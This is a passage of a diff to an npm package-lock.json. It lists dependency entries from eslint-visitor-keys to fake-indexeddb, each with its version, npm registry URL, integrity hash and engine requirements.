"https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/esprima": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", + "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", + "bin": { + "esparse": "bin/esparse.js", + "esvalidate": "bin/esvalidate.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/esprima-next": { + "version": "5.8.1", + "resolved": "https://registry.npmjs.org/esprima-next/-/esprima-next-5.8.1.tgz", + "integrity": "sha512-jPuleZ9j065A9xGKreFh9YSgPlbL9/miG/l4KslkwEb7Ilwl5Ct7BmDkSTHA0rW0qnqLx+hsZWIB66s1XaMAyA==", + "dev": true, + "bin": { + "esparse": "bin/esparse.js", + "esvalidate": "bin/esvalidate.js" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/esquery": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.6.0.tgz", + "integrity": "sha512-ca9pw9fomFcKPvFLXhBKUK90ZvGibiGOvRJNbjljY7s7uq/5YO4BOzcYtJqExdx99rF6aAcnRxHmcUHcz6sQsg==", + "dependencies": { + "estraverse": "^5.1.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/esrecurse": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", + "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", + "dependencies": { + "estraverse": "^5.2.0" + }, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/estraverse": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz", + "integrity": "sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==", + "engines": { + "node": ">=4.0" + } + }, + "node_modules/estree-walker": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/estree-walker/-/estree-walker-3.0.3.tgz", + "integrity": "sha512-7RUKfXgSMMkzt6ZuXmqapOurLGPPfgj6l9uRZ7lRGolvk0y2yocc35LdcxKC5PQZdn2DMqioAQ2NoWcrTKmm6g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/estree": "^1.0.0" + } + }, + "node_modules/esutils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", + "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/etag": { + "version": "1.8.1", + "resolved": "https://registry.npmjs.org/etag/-/etag-1.8.1.tgz", + "integrity": "sha1-Qa4u62XvpiJorr/qg6x9eSmbCIc=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/event-emitter": { + "version": "0.3.5", + "resolved": "https://registry.npmjs.org/event-emitter/-/event-emitter-0.3.5.tgz", + "integrity": "sha1-34xp7vFkeSPHFXuc6DhAYQsCzDk=", + "dependencies": { + "d": "1", + "es5-ext": "~0.10.14" + } + }, + "node_modules/event-target-shim": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/event-target-shim/-/event-target-shim-5.0.1.tgz", + "integrity": "sha512-i/2XbnSz/uxRCU6+NdVJgKWDTM427+MqYbkQzD321DuCQJUqOuJKIA0IM2+W2xtYHdKOmZ4dR6fExsd4SXL+WQ==", + "engines": { + "node": ">=6" + } + }, + "node_modules/eventemitter2": { + "version": "6.4.7", + "resolved": "https://registry.npmjs.org/eventemitter2/-/eventemitter2-6.4.7.tgz", + "integrity": "sha512-tYUSVOGeQPKt/eC1ABfhHy5Xd96N3oIijJvN3O9+TsC28T5V9yX9oEfEK5faP0EFSNVOG97qtAS68GBrQB2hDg==", + "dev": true + }, + "node_modules/eventemitter3": { + "version": "4.0.7", + "resolved": "https://registry.npmjs.org/eventemitter3/-/eventemitter3-4.0.7.tgz", + "integrity": "sha512-8guHBZCwKnFhYdHr2ysuRWErTwhoN2X8XELRlrRwpmfeY2jjuUN4taQMsULKUVo1K4DvZl+0pgfyoysHxvmvEw==", + "dev": true, + "license": "MIT" + }, + "node_modules/eventid": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/eventid/-/eventid-2.0.1.tgz", + "integrity": "sha512-sPNTqiMokAvV048P2c9+foqVJzk49o6d4e0D/sq5jog3pw+4kBgyR0gaM1FM7Mx6Kzd9dztesh9oYz1LWWOpzw==", + "dependencies": { + "uuid": "^8.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/eventid/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/events": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/events/-/events-1.1.1.tgz", + "integrity": "sha1-nr23Y1rQmccNzEwqH1AEKI6L2SQ=", + "engines": { + "node": ">=0.4.x" + } + }, + "node_modules/events-listener": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/events-listener/-/events-listener-1.1.0.tgz", + "integrity": "sha512-Kd3EgYfODHueq6GzVfs/VUolh2EgJsS8hkO3KpnDrxVjU3eq63eXM2ujXkhPP+OkeUOhL8CxdfZbQXzryb5C4g==" + }, + "node_modules/eventsource-parser": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/eventsource-parser/-/eventsource-parser-1.1.2.tgz", + "integrity": "sha512-v0eOBUbiaFojBu2s2NPBfYUoRR9GjcDNvCXVaqEf5vVfpIAh9f8RCo4vXTP8c63QRKCFwoLpMpTdPwwhEKVgzA==", + "engines": { + "node": ">=14.18" + } + }, + "node_modules/executable": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/executable/-/executable-4.1.1.tgz", + "integrity": "sha512-8iA79xD3uAch729dUG8xaaBBFGaEa0wdD2VkYLFHwlqosEj/jT66AzcreRDSgV7ehnNLBW2WR5jIXwGKjVdTLg==", + "dev": true, + "dependencies": { + "pify": "^2.2.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/exegesis": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/exegesis/-/exegesis-4.1.1.tgz", + "integrity": "sha512-PvSqaMOw2absLBgsthtJyVOeCHN4lxQ1dM7ibXb6TfZZJaoXtGELoEAGJRFvdN16+u9kg8oy1okZXRk8VpimWA==", + "dependencies": { + "@apidevtools/json-schema-ref-parser": "^9.0.3", + "ajv": "^8.3.0", + "ajv-formats": "^2.1.0", + "body-parser": "^1.18.3", + "content-type": "^1.0.4", + "deep-freeze": "0.0.1", + "events-listener": "^1.1.0", + "glob": "^7.1.3", + "json-ptr": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "lodash": "^4.17.11", + "openapi3-ts": "^3.1.1", + "promise-breaker": "^6.0.0", + "pump": "^3.0.0", + "qs": "^6.6.0", + "raw-body": "^2.3.3", + "semver": "^7.0.0" + }, + "engines": { + "node": ">=6.0.0", + "npm": ">5.0.0" + } + }, + "node_modules/exegesis-express": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/exegesis-express/-/exegesis-express-4.0.0.tgz", + "integrity": "sha512-V2hqwTtYRj0bj43K4MCtm0caD97YWkqOUHFMRCBW5L1x9IjyqOEc7Xa4oQjjiFbeFOSQzzwPV+BzXsQjSz08fw==", + "dependencies": { + "exegesis": "^4.1.0" + }, + "engines": { + "node": ">=6.0.0", + "npm": ">5.0.0" + } + }, + "node_modules/exegesis/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/exegesis/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==" + }, + "node_modules/exegesis/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/exegesis/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/exegesis/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/expand-brackets": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/expand-brackets/-/expand-brackets-2.1.4.tgz", + "integrity": "sha512-w/ozOKR9Obk3qoWeY/WDi6MFta9AoMR+zud60mdnbniMcBxRuFJyDt2LdX/14A1UABeqk+Uk+LDfUpvoGKppZA==", + "dev": true, + "dependencies": { + "debug": "^2.3.3", + "define-property": "^0.2.5", + "extend-shallow": "^2.0.1", + "posix-character-classes": "^0.1.0", + "regex-not": "^1.0.0", + "snapdragon": "^0.8.1", + "to-regex": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/expand-brackets/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/expand-brackets/node_modules/define-property": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-0.2.5.tgz", + "integrity": "sha512-Rr7ADjQZenceVOAKop6ALkkRAmH1A4Gx9hV/7ZujPUN2rkATqFO0JZLZInbAjpZYoJ1gUx8MRMQVkYemcbMSTA==", + "dev": true, + "dependencies": { + "is-descriptor": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/expand-brackets/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/expand-brackets/node_modules/is-descriptor": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-0.1.7.tgz", + "integrity": "sha512-C3grZTvObeN1xud4cRWl366OMXZTj0+HGyk4hvfpx4ZHt1Pb60ANSXqCK7pdOTeUQpRzECBSTphqvD7U+l22Eg==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + "is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/expand-brackets/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/expand-brackets/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==", + "dev": true + }, + "node_modules/expect": { + "version": "1.20.2", + "resolved": "https://registry.npmjs.org/expect/-/expect-1.20.2.tgz", + "integrity": "sha512-vUOB6rNLhhRgchrNzJZH72FXDgiHmmEqX07Nlb1363HyZm/GFzkNMq0X0eIygMtdc4f2okltziddtVM4D5q0Jw==", + "dev": true, + "dependencies": { + "define-properties": "~1.1.2", + "has": "^1.0.1", + "is-equal": "^1.5.1", + "is-regex": "^1.0.3", + "object-inspect": "^1.1.0", + "object-keys": "^1.0.9", + "tmatch": "^2.0.1" + } + }, + "node_modules/expect/node_modules/define-properties": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/define-properties/-/define-properties-1.1.4.tgz", + "integrity": "sha512-uckOqKcfaVvtBdsVkdPv3XjveQJsNQqmhXgRi8uhvWWuPYZCNlzT8qAyblUgNoXdHdjMTzAqeGjAoli8f+bzPA==", + "dev": true, + "dependencies": { + "has-property-descriptors": "^1.0.0", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/express": { + "version": "4.21.2", + "resolved": "https://registry.npmjs.org/express/-/express-4.21.2.tgz", + "integrity": "sha512-28HqgMZAmih1Czt9ny7qr6ek2qddF4FclbMzwhCREB6OFfH+rXAnuNCwo1/wFvrtbgsQDb4kSbX9de9lFbrXnA==", + "license": "MIT", + "dependencies": { + "accepts": "~1.3.8", + "array-flatten": "1.1.1", + "body-parser": "1.20.3", + "content-disposition": "0.5.4", + "content-type": "~1.0.4", + "cookie": "0.7.1", + "cookie-signature": "1.0.6", + "debug": "2.6.9", + "depd": "2.0.0", + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "finalhandler": "1.3.1", + "fresh": "0.5.2", + "http-errors": "2.0.0", + "merge-descriptors": "1.0.3", + "methods": "~1.1.2", + "on-finished": "2.4.1", + "parseurl": "~1.3.3", + "path-to-regexp": "0.1.12", + "proxy-addr": "~2.0.7", + "qs": "6.13.0", + "range-parser": "~1.2.1", + "safe-buffer": "5.2.1", + "send": "0.19.0", + "serve-static": "1.16.2", + "setprototypeof": "1.2.0", + "statuses": "2.0.1", + "type-is": "~1.6.18", + "utils-merge": "1.0.1", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.10.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/express" + } + }, + "node_modules/express-basic-auth": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/express-basic-auth/-/express-basic-auth-1.2.1.tgz", + "integrity": "sha512-L6YQ1wQ/mNjVLAmK3AG1RK6VkokA1BIY6wmiH304Xtt/cLTps40EusZsU1Uop+v9lTDPxdtzbFmdXfFO3KEnwA==", + "dependencies": { + "basic-auth": "^2.0.1" + } + }, + "node_modules/express-bearer-token": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/express-bearer-token/-/express-bearer-token-2.4.0.tgz", + "integrity": "sha512-2+kRZT2xo+pmmvSY7Ma5FzxTJpO3kGaPCEXPbAm3GaoZ/z6FE4K6L7cvs1AUZwY2xkk15PcQw7t4dWjsl5rdJw==", + "dependencies": { + "cookie": "^0.3.1", + "cookie-parser": "^1.4.4" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "node_modules/express-bearer-token/node_modules/cookie": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.3.1.tgz", + "integrity": "sha1-5+Ch+e9DtMi6klxcWpboBtFoc7s=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/express-flash": { + "version": "0.0.2", + "resolved": "https://registry.npmjs.org/express-flash/-/express-flash-0.0.2.tgz", + "integrity": "sha512-QVUR0ZZRCaa8+iPHoUQaQJrQWcQuK/Q+19M7IUIdIEtvwhrA/ifHT7y1CVJI41YfGiOQnbGtn3uvd2vOdgu58A==", + "dependencies": { + "connect-flash": "0.1.x" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/express-http-proxy": { + "version": "1.6.3", + "resolved": "https://registry.npmjs.org/express-http-proxy/-/express-http-proxy-1.6.3.tgz", + "integrity": "sha512-/l77JHcOUrDUX8V67E287VEUQT0lbm71gdGVoodnlWBziarYKgMcpqT7xvh/HM8Jv52phw8Bd8tY+a7QjOr7Yg==", + "dependencies": { + "debug": "^3.0.1", + "es6-promise": "^4.1.1", + "raw-body": "^2.3.0" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/express-http-proxy/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/express-rate-limit": { + "version": "2.14.2", + "resolved": "https://registry.npmjs.org/express-rate-limit/-/express-rate-limit-2.14.2.tgz", + "integrity": "sha512-aVYzfYU2Bv+v6ry/fBpTrX8MorM0p/TeDnx4CqiLevg9ftG8eW+pyuZ6JEreGdG2t1vXyTGHuSNRKLeYixuqZg==", + "dependencies": { + "defaults": "^1.0.3" + } + }, + "node_modules/express-session": { + "version": "1.17.2", + "resolved": "https://registry.npmjs.org/express-session/-/express-session-1.17.2.tgz", + "integrity": "sha512-mPcYcLA0lvh7D4Oqr5aNJFMtBMKPLl++OKKxkHzZ0U0oDq1rpKBnkR5f5vCHR26VeArlTOEF9td4x5IjICksRQ==", + "dependencies": { + "cookie": "0.4.1", + "cookie-signature": "1.0.6", + "debug": "2.6.9", + "depd": "~2.0.0", + "on-headers": "~1.0.2", + "parseurl": "~1.3.3", + "safe-buffer": "5.2.1", + "uid-safe": "~2.1.5" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/express-session/node_modules/cookie": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.1.tgz", + "integrity": "sha512-ZwrFkGJxUR3EIoXtO+yVE69Eb7KlixbaeAWfBQB9vVsNn/o+Yw69gBWSSDK825hQNdN+wF8zELf3dFNl/kxkUA==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/express-session/node_modules/cookie-signature": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", + "integrity": "sha1-4wOogrNCzD7oylE6eZmXNNqzriw=" + }, + "node_modules/express-session/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/express-session/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/express-session/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=" + }, + "node_modules/express-session/node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/express/node_modules/cookie": { + "version": "0.7.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.7.1.tgz", + "integrity": "sha512-6DnInpx7SJ2AK3+CTUE/ZM0vWTUboZCegxhC2xiIydHR9jNuTAASBrfEpHhiGOZw/nX51bHt6YQl8jsGo4y/0w==", + "license": "MIT", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/express/node_modules/cookie-signature": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", + "integrity": "sha1-4wOogrNCzD7oylE6eZmXNNqzriw=" + }, + "node_modules/express/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/express/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/express/node_modules/encodeurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz", + "integrity": "sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/express/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/express/node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/express/node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/express/node_modules/statuses": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.1.tgz", + "integrity": "sha512-RwNA9Z/7PrK06rYLIzFMlaF+l73iwpzsqRIFgbMLbTcLD6cOao82TaWefPXQvB2fOC4AjuYSEndS7N/mTCbkdQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/expressionify": { + "version": "0.9.3", + "resolved": "https://registry.npmjs.org/expressionify/-/expressionify-0.9.3.tgz", + "integrity": "sha1-/iJnx+hpRXfxP02oML/DyNgXf5I=" + }, + "node_modules/ext": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/ext/-/ext-1.6.0.tgz", + "integrity": "sha512-sdBImtzkq2HpkdRLtlLWDa6w4DX22ijZLKx8BMPUuKe1c5lbN6xwQDQCxSfxBQnHZ13ls/FH0MQZx/q/gr6FQg==", + "dependencies": { + "type": "^2.5.0" + } + }, + "node_modules/extend": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", + "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" + }, + "node_modules/extend-shallow": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-3.0.2.tgz", + "integrity": "sha512-BwY5b5Ql4+qZoefgMj2NUmx+tehVTH/Kf4k1ZEtOHNFcm2wSxMRo992l6X3TIgni2eZVTZ85xMOjF31fwZAj6Q==", + "dev": true, + "dependencies": { + "assign-symbols": "^1.0.0", + "is-extendable": "^1.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/extglob": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/extglob/-/extglob-2.0.4.tgz", + "integrity": "sha512-Nmb6QXkELsuBr24CJSkilo6UHHgbekK5UiZgfE6UHD3Eb27YC6oD+bhcT+tJ6cl8dmsgdQxnWlcry8ksBIBLpw==", + "dev": true, + "dependencies": { + "array-unique": "^0.3.2", + "define-property": "^1.0.0", + "expand-brackets": "^2.1.4", + "extend-shallow": "^2.0.1", + "fragment-cache": "^0.2.1", + "regex-not": "^1.0.0", + "snapdragon": "^0.8.1", + "to-regex": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/extglob/node_modules/define-property": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-1.0.0.tgz", + "integrity": "sha512-cZTYKFWspt9jZsMscWo8sc/5lbPC9Q0N5nBLgb+Yd915iL3udB1uFgS3B8YCx66UVHq018DAVFoee7x+gxggeA==", + "dev": true, + "dependencies": { + "is-descriptor": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/extglob/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/extglob/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/extract-zip": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extract-zip/-/extract-zip-2.0.1.tgz", + "integrity": "sha512-GDhU9ntwuKyGXdZBUgTIe+vXnWj0fppUEtMDL0+idd5Sta8TGpHssn/eusA9mrPr9qNDym6SxAYZjNvCn/9RBg==", + "dev": true, + "dependencies": { + "debug": "^4.1.1", + "get-stream": "^5.1.0", + "yauzl": "^2.10.0" + }, + "bin": { + "extract-zip": "cli.js" + }, + "engines": { + "node": ">= 10.17.0" + }, + "optionalDependencies": { + "@types/yauzl": "^2.9.1" + } + }, + "node_modules/extsprintf": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", + "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", + "engines": [ + "node >=0.6.0" + ] + }, + "node_modules/fake-indexeddb": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/fake-indexeddb/-/fake-indexeddb-6.0.0.tgz", + "integrity": "sha512-YEboHE5VfopUclOck7LncgIqskAqnv4q0EWbYCaxKKjAvO93c+TJIaBuGy8CBFdbg9nKdpN3AuPRwVBJ4k7NrQ==", + "dev": true, + "engines": { + "node": ">=18" + } + }, + 